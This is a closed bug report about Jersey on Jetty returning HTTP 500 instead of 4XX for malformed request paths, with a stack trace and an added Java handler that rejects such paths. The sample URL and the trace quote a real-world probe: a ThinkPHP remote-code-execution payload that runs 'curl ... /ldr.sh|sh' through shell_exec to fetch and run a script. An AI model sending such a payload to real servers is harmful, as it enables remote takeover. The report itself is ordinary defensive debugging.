Closed
If you deploy a Jersey + Jetty service to the big, bad public internet the service will inevitably start to receive requests at paths containing special characters. In some cases, instead of responding with HTTP 4XX errors, the Jersey internals will generate HTTP 500 errors.
This bug seems similar to issue #2952 (originally JERSEY-2680), except that bug was in the servlet stack and this is in the Jetty stack.
Sample problematic URL (for a Jersey service running on localhost on port 8181, with a path observed in the wild as part of a likely security probe, though the remote IP has been changed to 127.0.0.1 just to be safe):
http://localhost:8181/v1/abcdefgh/abcde/abcdef/abc/a/%3Fs=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://127.0.0.1/ldr.sh|sh
Sample stack trace for the exception which is uncaught and triggers the HTTP 500 error response:
java.lang.IllegalArgumentException: java.net.URISyntaxException: Illegal character in path at index 65: http://localhost:8181/v1/abcdefgh/abcde/abcdef/abc/a/%3Fs=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://127.0.0.1/ldr.sh|sh
    at org.glassfish.jersey.jetty.JettyHttpContainer.getRequestUri(JettyHttpContainer.java:214)
    at org.glassfish.jersey.jetty.JettyHttpContainer.handle(JettyHttpContainer.java:169)
    at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:97)
    at org.eclipse.jetty.server.handler.ResourceHandler.handle(ResourceHandler.java:439)
    at org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:553)
    at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:97)
    at org.eclipse.jetty.server.Server.handle(Server.java:499)
    at org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:311)
    at org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:257)
    at org.eclipse.jetty.io.AbstractConnection$2.run(AbstractConnection.java:544)
    at org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:635)
    at org.eclipse.jetty.util.thread.QueuedThreadPool$3.run(QueuedThreadPool.java:555)
    at java.base/java.lang.Thread.run(Thread.java:834)
Caused by: java.net.URISyntaxException: Illegal character in path at index 65: http://localhost:8181/v1/abcdefgh/abcde/abcdef/abc/a/%3Fs=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://127.0.0.1/ldr.sh|sh
    at java.base/java.net.URI$Parser.fail(URI.java:2915)
    at java.base/java.net.URI$Parser.checkChars(URI.java:3086)
    at java.base/java.net.URI$Parser.parseHierarchical(URI.java:3168)
    at java.base/java.net.URI$Parser.parse(URI.java:3116)
    at java.base/java.net.URI.<init>(URI.java:600)
    at org.glassfish.jersey.jetty.JettyHttpContainer.getRequestUri(JettyHttpContainer.java:212)
    ... 16 common frames omitted
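One way to answer such requests with HTTP 400 before they reach the Jersey container, as an added example that is not code from this issue or from the Jersey project. It assumes the Jetty 9 `HandlerWrapper` API with `javax.servlet`; the class name `StrictUriGuard`, the placeholder host and the sample paths are hypothetical, and only the path is checked, matching the "Illegal character in path" failure in the trace.

```java
import java.io.IOException;
import java.net.URI;
import java.net.URISyntaxException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.eclipse.jetty.server.Request;
import org.eclipse.jetty.server.handler.HandlerWrapper;

/** Hypothetical guard (not part of Jersey or Jetty): rejects paths java.net.URI cannot parse. */
public class StrictUriGuard extends HandlerWrapper {

    /** True when the raw, undecoded request path is accepted by the java.net.URI parser. */
    static boolean isParsablePath(String rawPath) {
        try {
            // Placeholder scheme and host: only the path component is being validated.
            new URI("http://placeholder.invalid" + rawPath);
            return true;
        } catch (URISyntaxException e) {
            return false;
        }
    }

    @Override
    public void handle(String target, Request baseRequest, HttpServletRequest request,
                       HttpServletResponse response) throws IOException, ServletException {
        // getRequestURI() is the path as received, the same string the trace shows failing to parse.
        if (!isParsablePath(request.getRequestURI())) {
            response.sendError(HttpServletResponse.SC_BAD_REQUEST, "Malformed request URI");
            baseRequest.setHandled(true); // the wrapped handler never sees this request
            return;
        }
        super.handle(target, baseRequest, request, response);
    }

    public static void main(String[] args) {
        // Constructed sample paths, not taken from real traffic.
        String[] samples = { "/v1/items/42", "/v1/items/a%5Cb", "/v1/items/a\\b", "/v1/items/a|b" };
        for (String path : samples) {
            // A raw backslash or pipe is illegal in a URI path; the percent-encoded form is fine.
            System.out.println((isParsablePath(path) ? "pass " : "400  ") + path);
        }
    }
}
```

To use it, wrap the existing handler with the guard's `setHandler(...)` and install the guard on the `Server` in its place.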